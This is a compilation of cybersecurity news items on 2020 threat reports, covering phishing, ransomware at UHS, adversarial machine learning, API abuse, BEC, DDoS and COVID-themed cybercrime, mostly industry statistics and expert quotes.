Wipro published a report which provides fresh insights on how AI will be leveraged as part of defender stratagems as more organizations lock horns with sophisticated cyberattacks and become more resilient.
Organizations need to tackle unknown attacks
There has been an increase in R&D with 49% of the worldwide cybersecurity related patents filed in the last four years being focussed on AI and ML application. Nearly half the organizations are expanding cognitive detection capabilities to tackle unknown attacks in their Security Operations Center (SOC).
The report also illustrates a paradigm shift towards cyber resilience amid the rise in global remote work. It considers the impact of COVID-19 pandemic on cybersecurity landscape around the globe and provides a path for organizations to adapt with this new normal.
The report saw a global participation of 194 organizations and 21 partner academic, institutional and technology organizations over four months of research.
Global macro trends in cybersecurity
- Nation state attacks target private sector: 86% of all nation-state attacks fall under espionage category, and 46% of them are targeted towards private companies.
- Evolving threat patterns have emerged in the consumer and retail sectors: 47% of suspicious social media profiles and domains were detected active in 2019 in these sectors.
Cyber trends sparked by the global pandemic
- Cyber hygiene proven difficult during remote work enablement: 70% of the organizations faced challenges in maintaining endpoint cyber hygiene and 57% in mitigating VPN and VDI risks.
- Emerging post-COVID cybersecurity priorities: 87% of the surveyed organizations are keen on implementing zero trust architecture and 87% are planning to scale up secure cloud migration.
Micro trends: An inside-out enterprise view
- Low confidence in cyber resilience: 59% of the organizations understand their cyber risks but only 23% of them are highly confident about preventing cyberattacks.
- Strong cybersecurity spend due to board oversight & regulations: 14% of organizations have a security budget of more than 12% of their overall IT budgets.
Micro trends: Best cyber practices to emulate
- Laying the foundation for a cognitive SOC: 49% of organizations are adding cognitive detection capabilities to their SOC to tackle unknown attacks.
- Concerns about OT infrastructure attacks increasing: 65% of organizations are performing log monitoring of Operation Technology (OT) and IoT devices as a control to mitigate increased OT Risks.
Meso trends: An overview on collaboration
- Fighting cyber-attacks demands stronger collaboration: 57% of organizations are willing to share only IoCs and 64% consider reputational risks to be a barrier to information sharing.
- Cyber-attack simulation exercises serve as a strong wakeup call: 60% participate in cyber simulation exercises coordinated by industry regulators, CERTs and third-party service providers and 79% organizations have dedicated cyber insurance policy in place.
Future of cybersecurity
- 5G security is the emerging area for patent filing: 7% of the worldwide patents filed in the cyber domain in the last four years have been related to 5G security.
Vertical insights by industry
- Banking, financial services & insurance: 70% of financial services enterprises said that new regulations are fuelling increase in security budgets, with 54% attributing higher budgets to board intervention.
- Communications: 71% of organizations consider cloud-hosting risk as a top risk.
- Consumer: 86% of consumer businesses said email phishing is a top risk and 75% enterprises said a bad cyber event will lead to damaged band reputation in the marketplace.
- Healthcare & life sciences: 83% of healthcare organizations have highlighted maintaining endpoint cyber hygiene as a challenge, 71% have highlighted that breaches reported by peers has led to increased security budget allocation.
- Energy, natural resources and utilities: 71% organizations reported that OT/IT Integration would bring new risks.
- Manufacturing: 58% said that they are not confident about preventing risks from supply chain providers.
Bhanumurthy B.M, President and Chief Operating Officer, Wipro said, “There is a significant shift in global trends like rapid innovation to mitigate evolving threats, strict data privacy regulations and rising concern about breaches.
“Security is ever changing and the report brings more focus, enablement, and accountability on executive management to stay updated. Our research not only focuses on what happened during the pandemic but also provides foresight toward future cyber strategies in a post-COVID world.”
New Zscaler threat research reveals the emerging techniques and impacted industries behind a 260-percent spike in attacks using encrypted channels to bypass legacy security controls.
Showing that cybercriminals will not be dissuaded by a global health crisis, they targeted the healthcare industry the most. Following healthcare, the research revealed the top industries under attack by SSL-based threats were:
1. Healthcare: 1.6 billion (25.5 percent)
2. Finance and Insurance: 1.2 billion (18.3 percent)
3. Manufacturing: 1.1 billion (17.4 percent)
4. Government: 952 million (14.3 percent)
5. Services: 730 million (13.8 percent)
COVID-19 is driving a ransomware surge
Researchers witnessed a 5x increase in ransomware attacks over encrypted traffic beginning in March, when the World Health Organization declared the virus a pandemic. Earlier research from Zscaler indicated a 30,000 percent spike in COVID-related threats, when cybercriminals first began preying on fears of the virus.
Phishing attacks neared 200 million
As one of the most commonly used attacks over SSL, phishing attempts reached more than 193 million instances during the first nine months of 2020. The manufacturing sector was the most targeted (38.6 percent) followed by services (13.8 percent), and healthcare (10.9 percent).
30 percent of SSL-based attacks spoofed trusted cloud providers
Cybercriminals continue to become more sophisticated in avoiding detection, taking advantage of the reputations of trusted cloud providers such as Dropbox, Google, Microsoft, and Amazon to deliver malware over encrypted channels.
Microsoft remains most targeted brand for SSL-based phishing
Since Microsoft technology is among the most adopted in the world, Zscaler identified Microsoft as the most frequently spoofed brand for phishing attacks, which is consistent with ThreatLabZ 2019 report. Other popular brands for spoofing included PayPal and Google. Cybercriminals are also increasingly spoofing Netflix and other streaming entertainment services during the pandemic.
“Cybercriminals are shamelessly attacking critical industries like healthcare, government and finance during the pandemic, and this research shows how risky encrypted traffic can be if not inspected,” said Deepen Desai, CISO and VP of Security Research at Zscaler. “Attackers have significantly advanced the methods they use to deliver ransomware, for example, inside of an organization utilizing encrypted traffic. The report shows a 500 percent increase in ransomware attacks over SSL, and this is just one example to why SSL inspection is so important to an organization’s defense.”
In today’s world, most external cyberattacks start with phishing. For attackers, it’s almost a no-brainer: phishing is cheap and humans are fallible, even after going through anti-phishing training.
Patrick Harr, CEO at SlashNext, says that while security awareness training is an important aspect of a multi-layered defense strategy, simulating attacks during computer-based training sessions is not an effective way to learn, because people don’t necessarily retain the information.
“Working from home, where there are more distractions, makes it even less likely that people really pay attention to these trainings. That’s why it’s not uncommon to see the same people who tune out training falling for scams again and again,” he noted.
That’s why defenders must preempt attacks, he says, and reinforce a lesson during a live attack. When something gets through and someone clicks on a malicious URL, defenders must be able to simultaneously block the attack and show the victim what the phisher was attempting to do.
Latest phishing trends
Harr, who has over 20 years of experience as a senior executive and GM at industry leading security and storage companies and as a serial entrepreneur and CEO at multiple successful start-ups, is now leading SlashNext, a cybersecurity startup that uses AI to predict and protect enterprise users from phishing threats.
He says that most CISOs assume phishing is a corporate email problem and their current line of defense is adequate, but they are wrong.
“We are detecting 21,000 new phishing attacks a day, many of which have moved beyond corporate email and simple credential stealing. These attacks can easily evade email phishing defenses that rely on static, reputation-based detection. That’s why we typically see 80-90% of attacks evading conventional lines of defense to compromise the network,” he told Help Net Security.
“Magnify this by 150,000 new zero-hour phishing threats a week, almost double the number of threats versus a year ago, and we can safely say, ‘Houston we have a problem!’”
They are seeing:
- More text-based phishing, with no actual links, across SMS, gaming, search services, ad networks, and collaboration platforms like Zoom, Teams, Box, Dropbox, and Slack, as well as attacks on mobile devices
- A proliferation of phishing payloads beyond credential stealing scams which have been around for ages
- An increase in scareware, where phishers attempt to scare people into taking an action, such as sharing an email
- Rogue software attacks embedded in browser extensions and social engineering schemes like the massive Twitter bitcoin scam that happened in July
“Finally, we’re seeing cybercriminals trying out innovative ways to evade detection. For example, bad actors may register a domain that lays dormant for months before going live,” he added, and noted that they’ve witnessed a 3,000% increase in the number of phishing attacks since everyone began working and learning from home, and they expect this growth trend will continue.
Advice for CISOs
His main advice to CISOs is not to be complacent and to be diligent: near term, mid-term, and long term.
“You’ve got to take a comprehensive, multi-layer phishing defense approach outside the firewall, where your biggest user population is working remotely, and inside the firewall for your internal users. You need to protect mobile devices and PC/Mac endpoints, with end-to-end encryption (E2EE) deployed,” he opined.
“You also have to be mindful of corporate users’ personal side as their personal and business lives have converged, and many people use the same devices and same credentials across personal and business accounts.
Thirdly, this type of attacks need to be prevented from happening. “Use AI-enabled defenses to fight AI-enabled attacks. Fight machines with machines and adopt a preemptive security posture.”
Finally: some attacks inevitably breach all defenses and they must be prepared to quickly detect and respond to attack, and perform the necessary cleanup.
A report published last year has noted that most attacks against artificial intelligence (AI) systems are focused on manipulating them (e.g., influencing recommendation systems to favor specific content), but that new attacks using machine learning (ML) are within attackers’ capabilities.
Microsoft now says that attacks on machine learning (ML) systems are on the uptick and MITRE notes that, in the last three years, “major companies such as Google, Amazon, Microsoft, and Tesla, have had their ML systems tricked, evaded, or misled.” At the same time, most businesses don’t have the right tools in place to secure their ML systems and are looking for guidance.
Experts at Microsoft, MITRE, IBM, NVIDIA, the University of Toronto, the Berryville Institute of Machine Learning and several other companies and educational organizations have therefore decided to create the first version of the Adversarial ML Threat Matrix, to help security analysts detect and respond to this new type of threat.
What is machine learning (ML)?
Machine learning is a subset of artificial intelligence (AI). It is based on computer algorithms that ingest “training” data and “learn” from it, and finally deliver predictions, decisions, or accurately classify things.
Security should be built in
Mikel Rodriguez, a machine learning researcher at MITRE who also oversees MITRE’s Decision Science research programs, says that we’re now at the same stage with AI as we were with the internet in the late 1980s, when people were just trying to make the internet work and when they weren’t thinking about building in security.
We can learn from that mistake, though, and that’s one of the reasons the Adversarial ML Threat Matrix has been created.
“With this threat matrix, security analysts will be able to work with threat models that are grounded in real-world incidents that emulate adversary behavior with machine learning,” he noted.
Also, the matrix will help them think holistically and spur better communication and collaboration across organizations by giving a common language or taxonomy of the different vulnerabilities, he says.
The Adversarial ML Threat Matrix
“Unlike traditional cybersecurity vulnerabilities that are tied to specific software and hardware systems, adversarial ML vulnerabilities are enabled by inherent limitations underlying ML algorithms. Data can be weaponized in new ways which requires an extension of how we model cyber adversary behavior, to reflect emerging threat vectors and the rapidly evolving adversarial machine learning attack lifecycle,” MITRE noted.
The matrix has been modeled on the MITRE ATT&CK framework.
The group has demonstrated how previous attacks – whether by researchers, read teams or online mobs – can be mapped to the matrix.
They also stressed that it’s going to be routinely updated as feedback from the security and adversarial machine learning community is received. They encourage contributors to point out new techniques, propose best (defense) practices, and share examples of successful attacks on machine learning (ML) systems.
“We are especially excited for new case-studies! We look forward to contributions from both industry and academic researchers,” MITRE concluded.
Cyberattacks are becoming increasingly sophisticated as tools and services on the dark web – and even the surface web – enable low-skill threat actors to create highly evasive threats. Unfortunately, most of today’s modern malware evades traditional signature-based anti-malware services, arriving to endpoints with ease. As a result, organizations lacking a layered security approach often find themselves in a precarious situation. Furthermore, threat actors have also become extremely successful at phishing users out of their credentials or simply brute forcing credentials thanks to the widespread reuse of passwords.
A lot has changed across the cybersecurity threat landscape in the last decade, but one thing has remained the same: the endpoint is under siege. What has changed is how attackers compromise endpoints. Threat actors have learned to be more patient after gaining an initial foothold within a system (and essentially scope out their victim).
Take the massive Norsk Hydro ransomware attack as an example: The initial infection occurred three months prior to the attacker executing the ransomware and locking down much of the manufacturer’s computer systems. That was more than enough time for Norsk to detect the breach before the damage could done, but the reality is most organization simply don’t have a sophisticated layered security strategy in place.
In fact, the most recent IBM Cost of a Data Breach Report found it took organizations an average of 280 days to identify and contain a breach. That’s more than 9 months that an attacker could be sitting on your network planning their coup de grâce.
So, what exactly are attackers doing with that time? How do they make their way onto the endpoint undetected?
It usually starts with a phish. No matter what report you choose to reference, most point out that around 90% of cyberattacks start with a phish. There are several different outcomes associated with a successful phish, ranging from compromised credentials to a remote access trojan running on the computer. For credential phishes, threat actors have most recently been leveraging customizable subdomains of well-known cloud services to host legitimate-looking authentication forms.
The above screenshot is from a recent phish WatchGuard Threat Lab encountered. The link within the email was customized to the individual recipient, allowing the attacker to populate the victim’s email address into the fake form to increase credibility. The phish was even hosted on a Microsoft-owned domain, albeit on a subdomain (servicemanager00) under the attacker’s control, so you can see how an untrained user might fall for something like this.
That secondary payload is usually a remote-access trojan or botnet of some form that includes a suite of tools like keyloggers, shell script-injectors, and the ability to download additional modules. The infection isn’t usually limited to the single endpoint for long after this. Attackers can use their foothold to identify other targets on the victim’s network and rope them in as well.
It’s even easier if the attackers manage to get hold of a valid set of credentials and the organization hasn’t deployed multi-factor authentication. It allows the threat actor to essentially walk right in through the digital front door. They can then use the victim’s own services – like built-in Windows scripting engines and software deployment services – in a living-off-the-land attack to carry out malicious actions. We commonly see threat actors leverage PowerShell to deploy fileless malware in preparation to encrypt and/or exfiltrate critical data.
The WatchGuard Threat Lab recently identified an ongoing infection while onboarding a new customer. By the time we arrived, the threat actor had already been on the victim’s network for some time thanks to compromising at least one local account and one domain account with administrative permissions. Our team was not able to identify how exactly the threat actor obtained the credentials, or how long they had been present on the network, but as soon as our threat hunting services were turned on, indicators immediately lit up identifying the breach.
In this attack, the threat actors used a combination of Visual Basic Scripts and two popular PowerShell toolkits – PowerSploit and Cobalt Strike – to map out the victim’s network and launch malware. One behavior we saw came from Cobalt Strike’s shell code decoder enabled the threat actors to download malicious commands, load them into memory, and execute them directly from there, without the code ever touching the victim’s hard drive. These fileless malware attacks can range from difficult to impossible to detect with traditional endpoint anti-malware engines that rely on scanning files to identify threats.
Elsewhere on the network our team saw the threat actors using PsExec, a built in Windows tool, to launch a remote access trojan with SYSTEM-level privileges thanks to the compromised domain admin credentials. The team also identified the threat actors attempts to exfiltrate sensitive data to a DropBox account using a command-line based cloud storage management tool.
Fortunately, they were able to identify and clean up the malware quickly. However, without the victim changing the stolen credentials, the attacker could have likely re-initiated their attack at-will. Had the victim deployed an advanced Endpoint Detection and Response (EDR) engine as part of their layered security strategy, they could have stopped or slowed the damage created from those stolen credentials.
Attackers are targeting businesses indiscriminately, even small organizations. Relying on a single layer of protection simply no longer works to keep a business secure. No matter the size of an organization, it’s important to adopt a layered security approach that can detect and stop modern endpoint attacks. This means protections from the perimeter down to the endpoint, including user training in the middle. And, don’t forget about the role of multifactor authentication (MFA) – could be the difference between stopping an attack and becoming another breach statistic.
US-based healtchare giant Universal Health Services (UHS) has suffered a cyberattack on Sunday morning, which resulted in the IT network across its facilities to be shut down.
Location of UHC facilities
UHS operates nearly 400 hospitals and healthcare facilities throughout the US, Puerto Rico and the UK.
“We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods,” the company stated on Monday.
“Patient care continues to be delivered safely and effectively. No patient or employee data appears to have been accessed, copied or misused.”
No more details were shared about the nature of the “IT security issue” (as they chose to call it), leaving the door open for unconfirmed reports from professed insiders (employees at some of the affected facilities) to proliferate online.
A Reddit thread started on Monday is chock full of them:
- The attack involved ransomware – Ryuk ransomware, to be more specific
- It’s unknown how many systems have been affected, i.e., how widespread is the damage
- “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center”
- Ambulances are being rerouted to other hospitals, information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment
- “4 people died tonight alone due to the waiting on results from the lab to see what was going on”
Was it Ryuk?
While most of these reports have yet to be verified, it seems almost certain that ransomware is in play.
Bleeping Computer was told by an employee that the encrypted files sported the .ryk extension and another employee described a ransom note that points to Ryuk ransomware.
“Ryuk can be difficult to detect and contain as the initial infection usually happens via spam/phishing and can propagate and infect IoT/IoMT devices, as we’ve seen with UHS hospital phones and radiology machines. Once on an infected host, it can pull passwords out of memory and then laterally moves through open shares, infecting documents, and compromised accounts,” commented Jeff Horne, CSO, Ordr.
Justin Heard, Director of Security, Intelligence and Analytics at Nuspire, noted that up until recently, Ryuk was used solely to target financial services, but over the last several months Ryuk has been seen targeting manufacturing, oil and gas, and now healthcare.
“Ryuk is known to target large organizations across industries because it demands a very high ransom. The ransomware operators likely saw UHS as the opportunity to make a quick buck given the urgency to keep operations going, and the monetary loss associated with that downtime could outweigh the ransom demand,” he explained.
“Ryuk Ransomware is run by a group called Wizard Spider, which is known as the Russia-based operator of the TrickBot banking malware. Ryuk is one of the most evasive ransomware out there. Nuspire Intelligence has repeatedly seen the triple threat combo of Ryuk, TrickBot and Emotet to wreak the most damage to a network and harvest the most amount of data.”
Some ransomware operators have previously stated that they would refrain from hitting healthcare organizations. Despite that, the number of attacks targeting medical institutions continues to rise.
Credential stuffing attacks are taking up a lot of the oxygen in cybersecurity rooms these days. A steady blitz of large-scale cybersecurity breaches in recent years have flooded the dark web with passwords and other credentials that are used in subsequent attacks such as those on Reddit and State Farm, as well as widespread efforts to exploit the remote work and online get-togethers resulting from the COVID-19 pandemic.
But while enterprises are rightly worried about weathering a hurricane of credential-stuffing attacks, they also need to be concerned about more subtle, but equally dangerous, threats to APIs that can slip in under the radar.
Attacks that exploit APIs, beyond credential stuffing, can start small with targeted probing of unique API logic, and lead to exploits such as the theft of personal information, wholesale data exfiltration or full account takeovers.
Unlike automated flood-the-zone, volume-based credential attacks, other API attacks are conducted almost one-to-one and carried out in elusive ways, targeting the distinct vulnerabilities of each API, making them even harder to detect than attacks happening on a large scale. Yet, they’re capable of causing as much, if not more, damage. And they’re becomingg more and more prevalent with APIs being the foundation of modern applications.
Beyond credential stuffing
Credential stuffing attacks are a key concern for good reason. High profile breaches—such as those of Equifax and LinkedIn, to name two of many—have resulted in billions of compromised credentials floating around on the dark web, feeding an underground industry of malicious activity. For several years now, about 80% of breaches that have resulted from hacking have involved stolen and/or weak passwords, according to Verizon’s annual Data Breach Investigations Report.
Additionally, research by Akamai determined that three-quarters of credential abuse attacks against the financial services industry in 2019 were aimed at APIs. Many of those attacks are conducted on a large scale to overwhelm organizations with millions of automated login attempts.
The majority of threats to APIs move beyond credential stuffing, which is only one of many threats to APIs as defined in the 2019 OWASP API Security Top 10. In many instances they are not automated, are much more subtle and come from authenticated users.
APIs, which are essential to an increasing number of applications, are specialized entities performing particular functions for specific organizations. Someone exploiting a vulnerability in an API used by a bank, retailer or other institution could, with a couple of subtle calls, dump the database, drain an account, cause an outage or do all kinds of other damage to impact revenue and brand reputation.
An attacker doesn’t even have to necessarily sneak in. For instance, they could sign on to Disney+ as a legitimate user and then poke around the API looking for opportunities to exploit. In one example of a front-door approach, a researcher came across an API vulnerability on the Steam developer site that would allow the theft of game license keys. (Luckily for the company, he reported it—and was rewarded with $20,000.)
Most API attacks are very difficult to detect and defend against since they’re carried out in such a clandestine manner. Because APIs are mostly unique, their vulnerabilities don’t conform to any pattern or signature that would allow common security controls to be enforced at scale. And the damage can be considerable, even coming from a single source. For example, an attacker exploiting a weakness in an API could launch a successful DoS attack with a single request.
Rather than the more common DDoS attack, which floods a target with requests from many sources via a botnet, an API DoS can happen when the attacker manipulates the logic of the API, causing the application to overwork itself. If an API is designed to return, say, 10 items per request, an attacker could change that value to 10 million, using up all of an application’s resources and crashing it—with a single request.
Credential stuffing attacks present security challenges of their own. With easy access to evasion tools—and with their own sophistication improving dramatically – it’s not difficult for attackers to disguise their activity behind a mesh of thousands of IP addresses and devices. But credential stuffing nevertheless is an established problem with established solutions.
How enterprises can improve
Enterprises can scale infrastructure to mitigate credential stuffing attacks or buy a solution capable of identifying and stopping the attacks. The trick is to evaluate large volumes of activity and block malicious login attempts without impacting legitimate users, and to do it quickly, identifying successful malicious logins and alerting users in time to protect them from fraud.
Enterprises can improve API security first and foremost by identifying all of their APIs including data exposure, usage, and even those they didn’t know existed. When APIs fly under security operators’ radar, otherwise secure infrastructure has a hole in the fence. Once full visibility is attained, enterprises can more tightly control API access and use, and thus, enable better security.
Exonar, has today published research revealing that 94 percent of IT pros have experienced a data breach, and an overwhelming majority (79 percent) are worried that their current organization could be next.
The survey of 500 IT professionals found that when it comes to cybersecurity, employee data breaches are seen as the biggest risk to an organization. Two fifths (40 percent) of respondents named employee data breaches as the biggest overall threat to information security in the coming year, while a fifth (21 percent) said external attacks from cybercriminals are the biggest risk to information security, and 20 per cent believe it is ransomware/malware attacks.
When looking at what causes employee data breaches, more than half (51 percent) of IT professionals say these most commonly occur through external email services such as Gmail and Outlook. However, 42 percent say employee data breaches have happened through collaboration tools such as Slack and Dropbox, and 41 per cent through SMS/messaging services. Just 6 percent of those surveyed said they had never knowingly experienced a data breach.
Despite data breaches being front of mind for IT teams, 95 percent of IT professionals say it’s a challenge to get visibility across their organizations’ data estate, and only 39 percent of organizations are taking active steps to gain visibility of their data.
“In simply performing their jobs, employees can unintentionally be the source of a data breach – by leaving high-risk information unprotected in the wrong place. It’s the responsibility of the company to provide the right methodology, technology, and processes that enable the workforce to continue to operate without burdening teams with undue process,” said Danny Reeves, CEO, Exonar.
“These days, every company is a data company, and large organizations often have thousands of systems and storage facilities. Unless companies are actively taking steps to know and understand their data, they’re leaving themselves vulnerable.”
Cybercriminals are increasingly registering accounts with legitimate services, such as Gmail and AOL, to use them in impersonation and BEC attacks, according to Barracuda Networks.
BEC attacks impact thousands of organizations
In their most recent threat spotlight report, Barracuda researchers observed that 6,170 malicious accounts that have used Gmail, AOL and other email services, have been responsible for over 100,000 BEC attacks which have impacted nearly 6,600 organizations. What’s more, since April 1, these ‘malicious accounts’ have been behind 45% of all BEC attacks detected.
Essentially, cybercriminals are using malicious accounts to impersonate an employee or trusted partner, and send highly personalized messages for the purpose of tricking other employees into leaking sensitive information, or sending over money.
Cybercriminals prefer Gmail
The preferred choice of email service for malicious accounts is Gmail, which accounts for 59% of all email domains used by cybercriminals. Yahoo! is the second most popular, accounting for just 6% of all observed malicious account attacks.
Researchers also observed that 29% of malicious accounts are used for less than 24-hour periods – most likely to avoid detection and suspensions from email providers. However, it’s not unusual for cybercriminals to return and re-use an email address for an attack after a long break.
Having analyzed attacks on 6,600 organizations, Barracuda researchers found that in many cases, cybercriminals used the same email addresses to attack different organizations. The number of organizations attacked by each malicious account ranged from one, to a single mass scale attack that impacted 256 organizations — 4% of all the organizations included in the research.
Similarly, the number of email attacks sent by a malicious account ranged from one to over 600 emails, with the average being only 19.
“The fact that email services such as Gmail are free to set up, just about anyone can create a potentially malicious account for the purpose of a BEC attack. Securing oneself against this threat requires organizations to take protection matters into their own hands – this requires them to invest in sophisticated email security that leverages artificial intelligence to identify unusual senders and requests,” said Michael Flouton, VP Email Protection, Barracuda Networks.
“However, no security software will ever be 100% effective, particularly when the sender appears to be using a perfectly legitimate email domain. Thus, employee training and education is essential, and workers should be made aware of how to manually spot, flag and block any potentially malicious content.”
Findings from Link11’s H1 2020 DDoS Report reveal a resurgence in DDoS attacks during the global COVID-19 related lockdowns.
In April, May and June 2020, the number of attacks registered by Link11’s Security Operations Center (LSOC) averaged 97% higher than the during the same period in 2019, peaking at a 108% increase in May 2020.
Key findings from the annual report include:
- Multivector attacks on the rise: 52% of attacks combined several methods of attack, making them harder to defend against. One attack included 14 methods; the highest number of vectors registered to date.
- Growing number of reflection amplification vectors: Most commonly used vectors included DNS, CLDAP and NTP, while WS Discovery and Apple Remote Control are still frequently used after being discovered in 2019. Since the beginning of the year, the vector set for DDoS attackers has also been expanded by DVR DHCPDiscovery. The LSOC discovered the vector that exploits a vulnerability in digital video recorders. The new method of attack was used hundreds of times for DDoS attacks during the COVID-19 pandemic in the second quarter of 2020.
- DDoS sources for reflection amplification attacks distributed around the globe: The top three most important source countries in H1 2020 were USA, China, and Russia. However, more and more attacks have been traced back to France.
- Average attack bandwidth remains high: The attack volume of DDoS attacks has stabilized at a high level, at an average of 4.1 Gbps. In the majority of attacks 80% were up to 5 Gbps. The largest DDoS attack was stopped at 406 Gbps. In almost 500 attacks, the attack volume was over 50 Gbps. This is well over the available connection bandwidth of most companies.
- DDoS attacks from the cloud: At 47%, the percentage of DDoS attacks from the cloud was higher than the full year 2019 (45%). Instances from all established providers were misused, but most commonly were Microsoft Azure, AWS, and Google Cloud. Attackers often use false identities and stolen credit cards to open cloud accounts, making it difficult to trace the criminals behind attacks.
- The longest DDoS attack lasted 1,390 minutes – 23 hours. Interval attacks, which are set like little pinpricks and thrive on repetition, lasted an average of 13 minutes.
The data showed that the frequency of DDoS attacks depends on the day of the week and time of the day, with most attacks concentrated around weekends and evenings. More attacks were registered on Saturdays, and out of office hours on weekdays.
“The pandemic has forced organizations to accelerate their digital transformation plans, but has also increased the attack surface for hackers and criminals – and they are looking to take full advantage of this opportunity by taking critical systems offline to cause maximum disruption. This ‘new normal’ will continue to represent a major security risk for many companies, and there is still a lot of work to do to secure networks and systems against the volume attacks. Organizations need to invest in security solutions based on automation, AI and Machine Learning that are designed to tackle multi-vector attacks and networked security mechanisms,” said Marc Wilczek, COO, Link11.
An INTERPOL assessment of the impact of COVID-19 on cybercrime has shown a significant target shift from individuals and small businesses to major corporations, governments and critical infrastructure.
With organizations and businesses rapidly deploying remote systems and networks to support staff working from home, criminals are also taking advantage of increased security vulnerabilities to steal data, generate profits and cause disruption.
In one four-month period (January to April) some 907,000 spam messages, 737 incidents related to malware and 48,000 malicious URLs – all related to COVID-19 – were detected by one of INTERPOL’s private sector partners.
“Cybercriminals are developing and boosting their attacks at an alarming pace, exploiting the fear and uncertainty caused by the unstable social and economic situation created by COVID-19,” said Jürgen Stock, INTERPOL Secretary General.
“The increased online dependency for people around the world, is also creating new opportunities, with many businesses and individuals not ensuring their cyber defences are up to date. The report’s findings again underline the need for closer public-private sector cooperation if we are to effectively tackle the threat COVID-19 also poses to our cyber health,” concluded the INTERPOL Chief.
Online scams and phishing
Threat actors have revised their usual online scams and phishing schemes. By deploying COVID-19 themed phishing emails, often impersonating government and health authorities, cybercriminals entice victims into providing their personal data and downloading malicious content. Around two-thirds of member countries which responded to the global cybercrime survey reported a significant use of COVID-19 themes for phishing and online fraud since the outbreak.
Cybercriminals are increasingly using disruptive malware against critical infrastructure and healthcare institutions, due to the potential for high impact and financial benefit. In the first two weeks of April 2020, there was a spike in ransomware attacks by multiple threat groups which had been relatively dormant for the past few months. Law enforcement investigations show the majority of attackers estimated quite accurately the maximum amount of ransom they could demand from targeted organizations.
Data harvesting malware
The deployment of data harvesting malware such as Remote Access Trojan, info stealers, spyware and banking Trojans by cybercriminals is on the rise. Using COVID-19 related information as a lure, threat actors infiltrate systems to compromise networks, steal data, divert money and build botnets.
Taking advantage of the increased demand for medical supplies and information on COVID-19, there has been a significant increase of cybercriminals registering domain names containing keywords, such as “coronavirus” or “COVID”.
These fraudulent websites underpin a wide variety of malicious activities including C2 servers, malware deployment and phishing. From February to March 2020, a 569 per cent growth in malicious registrations, including malware and phishing and a 788 per cent growth in high-risk registrations were detected and reported to INTERPOL by a private sector partner.
An increasing amount of misinformation and fake news is spreading rapidly among the public. Unverified information, inadequately understood threats, and conspiracy theories have contributed to anxiety in communities and in some cases facilitated the execution of cyberattacks. Nearly 30 per cent of countries which responded to the global cybercrime survey confirmed the circulation of false information related to COVID-19. Within a one-month period, one country reported 290 postings with the majority containing concealed malware.
There are also reports of misinformation being linked to the illegal trade of fraudulent medical commodities. Other cases of misinformation involved scams via mobile text-messages containing ‘too good to be true’ offers such as free food, special benefits, or large discounts in supermarkets.
A further increase in cybercrime is highly likely in the near future. Vulnerabilities related to working from home and the potential for increased financial benefit will see cybercriminals continue to ramp up their activities and develop more advanced and sophisticated modi operandi.
Threat actors are likely to continue proliferating coronavirus-themed online scams and phishing campaigns to leverage public concern about the pandemic. Business Email Compromise schemes will also likely surge due to the economic downturn and shift in the business landscape, generating new opportunities for criminal activities.
When a COVID-19 vaccination is available, it is highly probable that there will be another spike in phishing related to these medical products as well as network intrusion and cyberattacks to steal data.
Mimecast released the Threat Intelligence Report: Black Hat U.S.A. Edition 2020, which presents insights gleaned from the analysis of 195 billion emails processed by Mimecast for its customers from January through June 2020. Of those, 92 billion (47%) were flagged as malicious or spam and rejected.
Blocked impersonation attacks
Two main trends ran throughout the analysis: the desire for attacker’s monetary gain and a continued reliance on COVID-19-related campaigns, especially within certain vertical industries.
One of the most significant observations was that threat actors are launching opportunistic and malware-based campaigns across multiple verticals at volumes at an alarming rate. The report also forecasts what types of attacks will likely spike in the next six months.
Attacks and malware-centric campaigns
The majority of attacks seen by Mimecast during this period were simple, high volume forms of attacks, such as spam and phishing that is likely a reflection of the ease of access to tools and kits available online. As the attacks progressed, exploits evolved to more potent forms of malware and ransomware with the attacker’s goal appearing to be monetary gain.
In addition, malware-centric campaigns have been a fixture of 2020 and have become increasingly sophisticated. 42 significant campaigns were identified during the six-month period that the report covers. The campaigns showed a significant uptick in the use of short-lived, high volume, targeted and hybridized attacks against many sectors of the U.S. economy.
Researchers believe it is highly likely a consequence of threat actors targeting industries that remained opened during the ‘stay at home’ period in the U.S., as well as those essential to the nation’s recovery from the current pandemic. Interestingly, the media and publishing sectors suffered high volumes of impersonation attacks, potentially as a vehicle for cybercriminals to spread disinformation across the U.S.
“If one thing is for certain, the pandemic we’re living in today has caused significant challenges. We’ve continued to see threat actors tap into the vulnerabilities of humans and launch campaign after campaign with a COVID-19 hook, in attempt to get users to click harmful links or open malicious files,” said Josh Douglas, VP of product management, threat intelligence at Mimecast.
Mimecast signature detections
Understanding the modern threat landscape
Threat actors go where the money flows. The attacks from January-June 2020 incorporated a vast array of threats, including Azorult, Barys, Cryxos, Emotet, Hawkeye, Lokibot, Nanocore, Nemucod, Netwired, Remcos, Strictor, and ZLoader, and involved a combination of mass generic Trojan delivery with phishing campaigns with the goal of monetary gain.
Industries that remained opened during the pandemic where the hardest hit. The top sectors for attacks in the U.S. were: manufacturing, retail/wholesale, finance and insurance. In addition, the media and publishing sector suffered high volumes of impersonation attacks (48.4 million detections), potentially was a vehicle to spread disinformation across the U.S.
Organizations are at a higher risk of being attacked by ransomware. Researchers found that it is highly likely that U.S. businesses are at risk of ransomware attacks, due to threat actors’ efforts towards the high volume, opportunistic attack of multiple verticals. The circumstances of the pandemic make organizations more vulnerable to ransomware, so it will likely remain a significant threat for the second half of 2020.
Impersonation attacks continue to accelerate. The volume of sender impersonation attacks increased by 24% between January and June to nearly 46 million per month.
The media industry suffered 17 billion credential stuffing attacks between January 2018 and December 2019, according to a report from Akamai.
The apparent fourfold increase in attacks is partly attributable to the enhanced visibility into the threat landscape
The report found that 20% of the 88 billion total credential stuffing attacks observed during the reporting period targeted media companies.
Media companies present an attractive target
Media companies present an attractive target for criminals according to the report, which reveals a 63% year-over-year increase in attacks against the video media sector.
The report also shows 630% and 208% year-over-year increases in attacks against broadcast TV and video sites, respectively. At the same time, attacks targeting video services are up 98%, while those against video platforms dropped by 5%.
The marked uptick in attacks aimed at broadcast TV and video sites appear to coincide with an explosion of on-demand media content in 2019. In addition, two major video services launched last year with heavy support from consumer promotions. These types of sites and services are well aligned to the observed goals of the criminals who target them.
